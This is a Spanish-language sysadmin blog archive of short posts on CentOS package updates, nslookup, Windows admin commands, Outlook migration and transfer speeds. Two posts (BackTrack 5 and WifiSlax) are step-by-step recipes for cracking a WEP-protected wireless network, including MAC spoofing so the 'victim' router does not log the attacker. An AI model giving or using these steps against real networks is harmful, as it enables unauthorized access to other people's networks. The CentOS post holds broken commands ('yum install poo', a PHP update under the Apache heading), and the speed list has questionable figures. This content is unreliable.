• CentOS 06.09.2011 1 Comentario

    Actualizar Apache, PHP y MySql en CenOs 5.5

    Muchos de los servidores virtuales o dedicados de las compañias de hosting traen la distribucion CentOS de Linux como sistema operativo. Es habitual que las versiones de Apache, PHP y MySql esten desactualizadas al contratar el servidor o que se requiera la actualizacion a nuevas versiones a medida que estas van saliendo.

    He encontrado un repositorio que contiene todos los paquetes necesarios para poder proceder a actualizar dichos servicios a las ultimas versiones existentes, dicho repositorio se denomina PowerStack.

    Instalacion del repositorio PowerStack

    Descargamos el repositorio mediante el siguiente comando:

    rpm -Uvh http://download.powerstack.org/powerstack-release-0-1.noarch.rpm

    Instalamos el repositorio en nuestro servidor para poder actualizar los paquetes previamente comentados:

    yum install poo

    Actualizacion de Apache a la ultima version en CentOs 5.5

    Mediante el siguiente comando:
    yum -y update php

    Actualizacion de PHP a la ultima version en CentOs 5.5

    Mediante el siguiente comando:
    yum -y update php

    Luego es necesario editar el archivo /etc/php.ini, modificamos la siguiente linea:

    date.timezone = “Europe/Madrid”

    Nota: al realizar dicha actualizacion me surgieron fallos!!, opte por actualizar primero MySql y despues actualize el PHP exitosamente.

    Actualizacion de MySql a la ultima version en CentOs 5.5

    Mediante el siguiente comando:
    yum -y update mysql

    Una vez actualizados todos los paquetes tuve que reiniciar los servicios httpd y mysql ya que todas las paginas hechas en WordPress me arrojaban el siguiente error al intentar acceder a traves del navegador “Parece que tu instalación de PHP no cuenta con la extensión de MySQL, necesaria para hacer funcionar WordPress.“.

    Se puede verificar las versiones de los servicios corriendo en un servidor mediante los siguientes comandos:

    httpd -v ; mysql -u root-p -e status|grep ‘MySQL Version’; php -i|grep ‘PHP Version’

    Tags: , ,

  • back track 5

     

     

     

     

     

     

     

     

    Los pasos para crackear una red inalambrica con cifrado WEP con la distribucion de Linux denominada BackTrack 5 son los siguientes:

    airmon-ng start wlan0

    airodump-ng mon0

    airodump-ng -w “nombre_de_la_red_ a_crackear” –bssid “MAC_router_a_crackear” — channel “canal_red_a_crackear”  mon0

    Abrimos otra shell para poder lanzar los siguientes comandos:

    aireplay-ng -1 -a “MAC_router_a_crackear” -h “MAC_nuestra_tarjeta_de_red” -e “nombre_de_la_red_a_crackear” mon0 –> asociacion falsa

    aireplay-ng -3 -b “MAC_router_a_crackear” -h “MAC_nuestra_tarjeta_de_red” mon0 –> inyeccion de paquetes

    Llegados a este punto es conveniente desde otro PC intentar conectar a la red a crackear y meter la contraseña 1122334455 para que empiezen a subir los #data.

    Cuando los #data llegan a 40 000 ya se puede crackear la red mediante el siguiente comando:

    aircrack -ng fichero.cap (El nombre del fichero suele ser el nombre de la red seguido de -01.cap)

     

    Esta informacion a sido proporcionada por Jairo, para mas informacion sobre el autor consultar http://www.jairoespinosa.net/

    Tags: , , ,

  • velocidad

     

     

     

     

     

     

     

    Aqui os dejo ordenadas de menor a mayor las velocidades de las tecnologias de transmision de datos que conozco:

    3G –> 48 KB/s

    USB 1.1 –> 1,5 MB/s

    Wifi 802.11g –> 6,75 MB/s

    USB 2.0 –> 66 MB/s

    Firewire 400 –> 50 MB/s

    Firewire 800 –> 100 MB/s

    SATA 2 –> 300 MB/s

    SATA 3 –> 600 MB/s

    USB 3.0 –> 600 MB/s

    Si alguna velocidad es incorrecta o sabeis de alguna nueva tecnologia y su velocidad correspondiente no dudeis en dejarmelo saber.

    Tags: , , , , ,

  • WifiSlax

    Resumen rapido de los pasos a seguir:

    1. Wifislax > Asistencia chipset > Asistencia Intel Pro Wireless > Recargar modulo ipw 2200 inyeccion.
    2. iwconfig –> Para ver interfaces (ethx).
    3. airodump-ng -w captura rtap0 –> Se activa el sniffer o capturador de paquetes.

    Se abre una nueva consola o shell:

    1. kmdr-executor /usr/share/wifislax/macchanger-conf.kmdr –> Cambiamos la MAC de nuestro PC para que no se registre en el router de la victima nuestra verdadera MAC.
    2. iwconfig ethx essid “ESSID_A_CRACKEAR” channel z key 66666 –> Asociacion falsa a la red que queremos crackear (x y z se deben cambiar por los valores pertinentes).
    3. aireplay-ng -3 -x 1024 – b MAC_ROUTER_CRACKEAR -h 00:11:22:33:44:55 -i rtap ethx –> inyeccion de paquetes para capturar IVs
    4. Cuando los ARP Request esta en mas o menos 40 000, se para la inyeccion con CTRL + D.
    5. Se para el sniffer con CTRL + D (la 1ª shell).
    6. Se procede a crackear la contraseña a partir de la captura mediante aircrack-ng – z captura.cap.

    Tags: , , ,

  • Como funciona una peticion DNS

    nslookup

    A continuacion podemos poner un dominio para obtener su direccion/es ip:

    > google.es
    Servidor: UnKnown
    Address: 192.168.10.136 –> Servidor DNS local

    Respuesta no autoritativa:
    Nombre: google.es
    Addresses: 209.85.229.104
    209.85.229.147
    209.85.229.99

    Vemos que el dominio google.es tiene las ips 209.85.229.104, 209.85.229.147 y 209.85.229.99.

    Obtener informacion detallada

    Se puede obtener informacion mas detallada (servidores dns, servidores de correo, etc) mediante set type =any:

    > set type=any
    > google.es
    Servidor: UnKnown
    Address: 192.168.10.136

    Respuesta no autoritativa:
    google.es internet address = 209.85.229.147
    google.es internet address = 209.85.229.104
    google.es internet address = 209.85.229.99
    google.es nameserver = ns1.google.com
    google.es nameserver = ns3.google.com
    google.es nameserver = ns2.google.com
    google.es nameserver = ns4.google.com
    google.es
    primary name server = ns1.google.com
    responsible mail addr = dns-admin.google.com
    serial = 1442071
    refresh = 21600 (6 hours)
    retry = 3600 (1 hour)
    expire = 1209600 (14 days)
    default TTL = 300 (5 mins)
    google.es MX preference = 10, mail exchanger = google.com.s9a1.psmtp.com
    google.es MX preference = 10, mail exchanger = google.com.s9b2.psmtp.com
    google.es MX preference = 10, mail exchanger = google.com.s9a2.psmtp.com
    google.es MX preference = 10, mail exchanger = google.com.s9b1.psmtp.com

    ns1.google.com internet address = 216.239.32.10
    ns3.google.com internet address = 216.239.36.10
    ns2.google.com internet address = 216.239.34.10
    ns4.google.com internet address = 216.239.38.10
    google.com.s9a1.psmtp.com internet address = 74.125.148.10
    google.com.s9b2.psmtp.com internet address = 74.125.148.14
    google.com.s9a2.psmtp.com internet address = 74.125.148.11
    google.com.s9b1.psmtp.com internet address = 74.125.148.13

    Obtener informacion de los servidores de correo

    Si solo queremos ver los servidores de correo podemos hacerlo mediante set type=mx:

    > set type=mx
    > google.es
    Servidor: UnKnown
    Address: 192.168.10.136

    Respuesta no autoritativa:
    google.es MX preference = 10, mail exchanger = google.com.s9a1.psmtp.com
    google.es MX preference = 10, mail exchanger = google.com.s9b2.psmtp.com
    google.es MX preference = 10, mail exchanger = google.com.s9a2.psmtp.com
    google.es MX preference = 10, mail exchanger = google.com.s9b1.psmtp.com

    google.com.s9a1.psmtp.com internet address = 74.125.148.10
    google.com.s9b2.psmtp.com internet address = 74.125.148.14
    google.com.s9a2.psmtp.com internet address = 74.125.148.11
    google.com.s9b1.psmtp.com internet address = 74.125.148.13

    ¿Como encuentro los servidores raiz?

    > set type=ns
    > google.es
    Servidor: UnKnown
    Address: 192.168.10.136

    Respuesta no autoritativa:
    google.es nameserver = ns1.google.com
    google.es nameserver = ns3.google.com
    google.es nameserver = ns2.google.com
    google.es nameserver = ns4.google.com

    ns1.google.com internet address = 216.239.32.10
    ns3.google.com internet address = 216.239.36.10
    ns2.google.com internet address = 216.239.34.10
    ns4.google.com internet address = 216.239.38.10

    Como encontrar informacion de la zona

    > set type=soa
    > google.es
    Servidor: UnKnown
    Address: 192.168.10.136

    Respuesta no autoritativa:
    google.es
    primary name server = ns1.google.com
    responsible mail addr = dns-admin.google.com
    serial = 1442071
    refresh = 21600 (6 hours)
    retry = 3600 (1 hour)
    expire = 1209600 (14 days)
    default TTL = 300 (5 mins)

    ns1.google.com internet address = 216.239.32.10

    No esta de mas comentar que el comando tambien se puede utilizar a partir de una IP para obtener el nombre del host.

    Tags: , , , ,

  • Configuracion de usuarios

    Añadir un usuario al sistema que pertenezca a un grupo, tenga un directorio home y tenga la shell deshabilitada:
    useradd -d “dir_home” -g “grupo” -s /bin/false “nombre_de_usuario”

    Para eliminar usuarios:
    deluser “nombre_de_usuario”

    Tags: ,

  • Listado de comandos para la administracion de sistemas a traves de cmd.exe:

    cacls: Permite modificar los permisos en ficheros y carpetas, permitiendo o prohibiendo a cada usuario leer, escribir o modificar el contenido de dichos archivos o carpetas.
    cipher: Permite cifrar archivos, directorios o particiones siempre que se encuentren en el sistema de archivos NTFS.
    diskpart: Permite crear, eliminar y administrar particiones. Este programa en modo consola debemos utilizarlo con cuidado puesto que es fácil que eliminemos sin darnos cuenta todo el contenido del disco duro o de la partición activa.
    find y findstr: Estos comandos buscan cadenas de textos en el interior de uno o varios archivos. Sin embargo, el comando findstr ofrece más opciones de búsqueda que el comando find.
    iexpress: Este comando lanzará un asistente para crear archivos comprimidos .CAB autodescomprimibles.
    openfiles: Muestra a un administrador los archivos abiertos en un sistema a un administrador y permite desconectarlos si se han abierto a través de red.
    bootcfg: Permite ver y modificar las entradas del archivo boot.ini. Estas entradas nos permiten seleccionar con que sistema operativo deseamos iniciar el equipo.
    control userpasswords2: Permite modificar las claves y los permisos de los diferentes usuarios, así como requerir la pulsación de control+alt+suprimir para poder iniciar sesión, haciendo el inicio de sesión más seguro.
    gpresult: Muestra información sobre las políticas de grupo aplicadas a un usuario.
    gpupdate: Vuelve a aplicar las políticas de grupo.
    sc: Este commando nos permite administrar los servicios, ya sea iniciar uno, detenerlo, mandarle señales, etc.
    sfc: Este comando permite buscar archivos del sistema dañados y recuperarlos en caso de que estén defectuosos (es necesario el CD de instalación del sistema operativo para utilizarlo). Para realizar una comprobación inmediata, deberemos ejecutar la orden sfc /scannow.
    systeminfo: Muestra información sobre nuestro equipo y nuestro sistema operativo: número de procesadores, tipo de sistema, actualizaciones instaladas, etc.
    taskkill: Permite eliminar un proceso conociendo su nombre o el número del proceso (PID).
    tasklist: Realiza un listado de todos los procesos que hay. Útil si deseamos eliminar un proceso y no conocemos exactamente su nombre o su PID.
    at: Permite programar tareas para que nuestro ordenador las ejecute en una fecha o en un momento determinado.
    logoff:: Este comando nos permite cerrar una sesión iniciada, ya sea en nuestro ordenador o en otro ordenador remoto.
    msg:: Envía un mensaje a unos o varios usuarios determinados mediante su nombre de inicio de sesión o el identificador de su sesión
    msiexec: Permite instalar, desinstalar o reparar un programa instalado mediante un paquete MSI (archivos con extensión .msi).
    runas: Permite ejecutar un programa con privilegios de otra cuenta. Útil por ejemplo si estamos como usuario limitado y queremos hacer algo que necesite privilegios de administrador.
    shctasks: Permite administrar las tareas programadas.
    shutdown: Permite apagar, reiniciar un ordenador o cancelar un apagado. Es especialmente útil si hemos sido infectado con el virus Blaster o una de sus variantes para cancelar la cuenta atrás. Para ello, tan sólo tendremos que utilizar la sintaxis shutdown -a.
    ciadv.msc: Permite configurar el servicio de indexado, que acelera las búsquedas en el disco duro.
    compmgmt.msc: Da acceso a la Administración de equipos, desde donde podemos configurar nuestro ordenador y acceder a otras partes de la MMC.
    devmgmt.msc: Accede al Administrador de dispositivos.
    dfrg.msc: Desfragmentador del disco duro.
    diskmgmt.msc: Administrador de discos duros.
    fsmgmt.msc: Permite administrar y monitorizar los recursos compartidos.
    gpedit.msc: Permite modificar las políticas de grupo.
    lusrmgr.msc: Permite ver y modificar los usuarios y grupos locales.
    ntmsmgr.msc: Administra y monitoriza los dispositivos de almacenamientos extraíbles.
    ntmsoprq.msc: Monitoriza las solicitudes del operador de medios extraíbles.
    perfmon.msc: Monitor de rendimiento del sistema.
    secpol.msc: Configuración de la política de seguridad local.
    services.msc: Administrador de servicios locales.
    wmimgmt.msc: Configura y controla el servicio Instrumental de administración (WMI) de Windows.

    Tags: , , ,

  • logo outllook

    Para abrir el Outlook en modo a prueba de fallos se ha ce mediante CTRL + Doble click en el icono de Outlook.

    Para que sirve: para eliminar correos de gran tamaño en la bandeja de salida, etc.

    Tags: , , , ,

  • Motivos de la migracion: La bandeja de entrada del Outlook Express no soporta mas de 2GB. El .dbx de la bandeja de entrada supera los 2GB permitidos y por lo tanto la cuenta no envia/recibe mas correos.

    Posible solucion: Reducir el tamaño del .dbx de la bandeja de entrada a menos de 2.00 Gb mediante algun SW.
    Migrar a Outlook 2000 conservando la configuracion de la cuenta y los correos del cliente.

    Solucion final: Optamos por la migracion a Outlook 2000 con el fin de mejorar la configuracion del cliente.

    El Outlook Express funciona con archivos .dbx mientras que el Outlook 2000 funciona con .pst. El Outlook 2000 no permite importar los correos desde un fichero .dbx directamente, por lo que es necesario su conversion a .eml.

    Un vez tenemos los correos en .eml se arrastran en bloques de menos de 2GB a una carpeta dentro del buzon de entrada del Outlook 2000 (los .eml se veran como adjuntos de los email) con la cuenta de correo previamente configurada. Otra opcion es arrastrar los .eml a una carpeta de Outlook Express y luego importar toda la configuracion de Outlook Express a Outlook 2000, siendo esta segunda opcion la mas efectiva.

    Tags: , , , ,